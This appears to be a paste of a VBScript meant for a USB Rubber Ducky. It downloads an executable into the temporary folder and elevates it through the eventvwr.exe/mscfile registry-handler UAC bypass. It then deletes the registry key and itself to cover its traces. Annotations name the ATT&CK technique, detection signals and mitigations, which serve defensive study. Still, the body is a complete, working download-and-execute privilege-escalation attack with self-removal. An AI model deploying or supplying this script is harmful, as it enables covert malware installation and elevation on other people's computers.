
DUCKY: 2-4 second download + execute with UAC Bypass

a guest Nov 18th, 2016 343 Never
  1. Sub Main()
      ' Downloads fileurl to pt.exe in the temporary folder, writes that path as the
      ' per-user mscfile open command, starts eventvwr.exe, then deletes the
      ' registry key and the script file. This is the eventvwr/mscfile handler
      ' hijack, catalogued as MITRE ATT&CK T1548.002 (Bypass User Account Control).
      ' Detection points: a value write under
      ' HKCU\Software\Classes\mscfile\shell\open\command, eventvwr.exe starting a
      ' child process other than mmc.exe, and a script host (wscript/cscript)
      ' making an outbound HTTP request and writing an .exe into %TEMP%.
  2. 'Settings: payload URL and on-disk destination
      ' The URL points at a PuTTY build; presumably a stand-in for any payload.
  3. fileurl = "https://the.earth.li/~sgtatham/putty/latest/x86/putty.exe"
      ' GetSpecialFolder(2) is the temporary folder, so the drop path is <temp>/pt.exe.
  4. filename = WScript.CreateObject("Scripting.FileSystemObject").GetSpecialFolder(2) & "/pt.exe"
  5.  
  6. 'Download: synchronous HTTP GET, response body saved to disk as binary
      ' NOTE(review): shellobj is created here but not referenced again in this Sub.
  7. dim shellobj
  8. set shellobj = wscript.createobject("wscript.shell")
  9. set objhttpdownload = createobject("msxml2.xmlhttp" )
      ' Third argument false = synchronous request; send blocks until the response arrives.
  10. objhttpdownload.open "get", fileurl, false
  11. objhttpdownload.send
  12. set objfsodownload = createobject ("scripting.filesystemobject")
      ' Remove any earlier copy first. savetofile below is called without an
      ' overwrite option, so presumably this avoids a file-exists failure.
  13. if  objfsodownload.fileexists (filename) then
  14.     objfsodownload.deletefile (filename)
  15. end if
      ' Only a 200 response is written to disk. Any other status skips the write,
      ' but the registry write and eventvwr launch further down still run.
  16.  if objhttpdownload.status = 200 then
  17.    dim  objstreamdownload
  18.    set  objstreamdownload = createobject("adodb.stream")
  19.    with objstreamdownload
         ' type 1 = binary stream, so the body is written unmodified
  20.         .type = 1
  21.         .open
  22.         .write objhttpdownload.responsebody
  23.         .savetofile filename
  24.         .close
  25.    end with
  26.    set objstreamdownload = nothing
  27. end if
  28.  
  29. 'Handler hijack setup
      ' The trailing backslash makes RegWrite set the default value of the key, so
      ' the open command for .msc files of this user becomes the dropped file.
      ' HKCU is writable without elevation, which is why no prompt appears here.
      ' Monitoring: registry set-value events on this key path (for example Sysmon
      ' event IDs 12/13) are a high-fidelity signal; legitimate software rarely
      ' creates a per-user mscfile handler.
  30. Set WshShell = CreateObject("WScript.Shell")
  31. myKey = "HKCU\Software\Classes\mscfile\shell\open\command\"
  32. WshShell.RegWrite myKey,filename ,"REG_SZ"
  33.  
  34. 'Trigger
      ' eventvwr.exe auto-elevates and resolves the mscfile handler; with the HKCU
      ' override in place the dropped file is started in its place.
      ' Mitigations: UAC set to Always notify, and users not running as members of
      ' local Administrators. NOTE(review): whether a given Windows build still
      ' resolves this handler from HKCU should be confirmed per fleet.
  35. CreateObject("WScript.Shell").Run "eventvwr.exe"
  36.  
      ' The key is left in place for about one second before removal, so
      ' point-in-time registry sweeps will miss it; event-based registry telemetry
      ' is needed to see the write and the delete.
  37. WScript.Sleep 1000
  38.  
  39. 'Registry cleanup: the trailing backslash makes RegDelete remove the key itself
  40. Set objShell = Wscript.CreateObject("Wscript.Shell")
  41. objShell.RegDelete "HKCU\Software\Classes\mscfile\shell\open\command\"
  42.  
  43.  
  44. 'Self-removal: deletes %temp%\run.vbs in a hidden window (0) and waits (True)
      ' Assumes the script was saved as %temp%\run.vbs; the delivery step is not
      ' shown on this page. pt.exe is not deleted anywhere in this Sub, so it stays
      ' in the temporary folder as a forensic artifact.
  45. Set Cleanup = WScript.CreateObject("WScript.Shell")
  46. Cleanup.Run "cmd /c del %temp%\run.vbs", 0, True
  47.  
  48. End Sub
  49.  
  50. 'Entry point. On Error Resume Next suppresses error dialogs: a runtime error
      ' inside Main ends Main and resumes here with Err set.
      ' Forensic note: this failure path only deletes the script file. If Main
      ' stops after its RegWrite and before its RegDelete, the
      ' HKCU\Software\Classes\mscfile\shell\open\command key is left behind.
  51. On Error Resume Next
  52.   Main
  53.   If Err.Number Then
  54.      'On failure: delete %temp%\run.vbs (hidden window, wait for completion),
         ' then exit the script host with code 4711
  55.      set Cleanup = WScript.CreateObject("WScript.Shell")
  56.      Cleanup.Run "cmd /c del %temp%\run.vbs", 0, True
  57.      WScript.Quit 4711
  58. End If